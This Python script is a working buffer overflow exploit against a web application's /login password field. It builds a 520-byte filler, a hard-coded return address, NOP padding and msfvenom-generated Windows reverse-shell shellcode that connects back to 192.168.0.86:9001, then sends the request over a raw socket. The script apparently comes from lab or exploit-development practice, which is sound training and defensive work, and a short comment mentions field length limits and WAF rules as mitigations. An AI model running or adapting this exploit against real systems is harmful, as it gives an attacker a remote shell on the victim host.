#!/usr/bin/env python3
import socket
# Target of the connection below (lab address as given on the page);
# note that the request itself names 127.0.0.1 in its Host/Origin/Referer headers.
ip, port = "192.168.0.87", 80
def generate_overflow(payload):
    """Build a raw HTTP/1.1 POST to /login whose password field is *payload*.

    The body is ``username=admin&password=<payload>``. *payload* is inserted
    verbatim — nothing is URL-encoded — so the field can carry arbitrary
    latin-1 characters, and Content-Length is the str length of that body
    (equal to the byte length once the caller encodes it as latin-1).
    Host, Origin and Referer always name 127.0.0.1, independent of the
    address the caller actually connects to.

    Returns the complete request as a str with CRLF line endings.
    """
    body = f"username=admin&password={payload}"
    header_lines = [
        "POST /login HTTP/1.1",
        "Host: 127.0.0.1",
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Content-Type: application/x-www-form-urlencoded",
        "Origin: http://127.0.0.1",
        "Connection: close",
        "Referer: http://127.0.0.1/login",
        "Upgrade-Insecure-Requests: 1",
        f"Content-Length: {len(body)}",
    ]
    # Headers joined by CRLF, terminated by CRLF, then the blank line, then the body.
    return "\r\n".join(header_lines) + "\r\n\r\n" + body
# Add bad chars here after first iteration of finding bad chars
# Then re-generate bytearray with the bad chars removed using mona
# Characters that must not appear in the injected field; the list is the same
# one passed as -b to the msfvenom command quoted further down.
remove_badchars_from_badchars = "\x00\x0a\x0d\x25\x26\x2b\x3d"
# Every byte value 0x01..0xff as a latin-1 str. int(hex(x), 16) round-trips
# back to x, so each element is simply chr(x).
badchars = "".join([chr(int(hex(x),16)) for x in range(1,256)])
for char in remove_badchars_from_badchars:
    badchars = badchars.replace(char, "")
# NOTE(review): `badchars` is not referenced again in this file; it is the
# probe string for the bad-character round and is not part of `buffer` below.
offset = 520
# Filler that precedes the value placed in `retn`.
overflow = "A" * offset
retn = "\x83\x0c\x09\x10" # 0x10090c83 \x83\x0c\x09\x10
# `retn` is the little-endian byte order of the address in the trailing comment.
padding = "\x90" * 10 # Has to be at least 4
# 0x90 is the x86 single-byte NOP; the "at least 4" requirement is the
# author's note and is not verified here.
# Badchars: \x00\x0a\x0d\x25\x26\x2b\x3d
# Payload: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.86 LPORT=9001 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f c
# Output of the command above, kept verbatim; its -b option excludes the
# characters listed in remove_badchars_from_badchars.
payload = (
"\xda\xc7\xb8\x0c\xdd\x28\xcc\xd9\x74\x24\xf4\x5a\x31\xc9"
"\xb1\x52\x31\x42\x17\x83\xc2\x04\x03\x4e\xce\xca\x39\xb2"
"\x18\x88\xc2\x4a\xd9\xed\x4b\xaf\xe8\x2d\x2f\xa4\x5b\x9e"
"\x3b\xe8\x57\x55\x69\x18\xe3\x1b\xa6\x2f\x44\x91\x90\x1e"
"\x55\x8a\xe1\x01\xd5\xd1\x35\xe1\xe4\x19\x48\xe0\x21\x47"
"\xa1\xb0\xfa\x03\x14\x24\x8e\x5e\xa5\xcf\xdc\x4f\xad\x2c"
"\x94\x6e\x9c\xe3\xae\x28\x3e\x02\x62\x41\x77\x1c\x67\x6c"
"\xc1\x97\x53\x1a\xd0\x71\xaa\xe3\x7f\xbc\x02\x16\x81\xf9"
"\xa5\xc9\xf4\xf3\xd5\x74\x0f\xc0\xa4\xa2\x9a\xd2\x0f\x20"
"\x3c\x3e\xb1\xe5\xdb\xb5\xbd\x42\xaf\x91\xa1\x55\x7c\xaa"
"\xde\xde\x83\x7c\x57\xa4\xa7\x58\x33\x7e\xc9\xf9\x99\xd1"
"\xf6\x19\x42\x8d\x52\x52\x6f\xda\xee\x39\xf8\x2f\xc3\xc1"
"\xf8\x27\x54\xb2\xca\xe8\xce\x5c\x67\x60\xc9\x9b\x88\x5b"
"\xad\x33\x77\x64\xce\x1a\xbc\x30\x9e\x34\x15\x39\x75\xc4"
"\x9a\xec\xda\x94\x34\x5f\x9b\x44\xf5\x0f\x73\x8e\xfa\x70"
"\x63\xb1\xd0\x18\x0e\x48\xb3\xe6\x67\x52\x15\x8f\x75\x52"
"\xba\x66\xf3\xb4\xd6\x68\x55\x6f\x4f\x10\xfc\xfb\xee\xdd"
"\x2a\x86\x31\x55\xd9\x77\xff\x9e\x94\x6b\x68\x6f\xe3\xd1"
"\x3f\x70\xd9\x7d\xa3\xe3\x86\x7d\xaa\x1f\x11\x2a\xfb\xee"
"\x68\xbe\x11\x48\xc3\xdc\xeb\x0c\x2c\x64\x30\xed\xb3\x65"
"\xb5\x49\x90\x75\x03\x51\x9c\x21\xdb\x04\x4a\x9f\x9d\xfe"
"\x3c\x49\x74\xac\x96\x1d\x01\x9e\x28\x5b\x0e\xcb\xde\x83"
"\xbf\xa2\xa6\xbc\x70\x23\x2f\xc5\x6c\xd3\xd0\x1c\x35\xf3"
"\x32\xb4\x40\x9c\xea\x5d\xe9\xc1\x0c\x88\x2e\xfc\x8e\x38"
"\xcf\xfb\x8f\x49\xca\x40\x08\xa2\xa6\xd9\xfd\xc4\x15\xd9"
"\xd7"
)
postfix = ""
# Final value of the password form field: filler, return address, NOP
# filler, shellcode. It is built as a str so that the latin-1 encoding at the
# send() call maps each code point 0..255 to exactly one byte.
buffer = overflow + retn + padding + payload + postfix
# Detection/mitigation note: generate_overflow() does not URL-encode the
# field, so the application/x-www-form-urlencoded body carries a 520-byte run
# of "A" followed by raw non-printable bytes. A length limit on the login
# handler's password field, or an IDS/WAF rule on non-printable characters in
# form values, would reject this request before it reaches the parser.
# View the payload before sending
# print(bytes(generate_overflow(buffer), "latin-1"))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    # NOTE(review): send() may write fewer bytes than requested; its return
    # value is not checked and the socket is closed immediately afterwards.
    s.send(bytes(generate_overflow(buffer), "latin-1"))
    s.close()
    print("Done!")
except Exception as e:
    # Any exception from connect(), send() or close() lands here, so the
    # "Could not connect" message can be misleading when the connection itself
    # succeeded and a later call failed.
    print(f"Could not connect. {e}")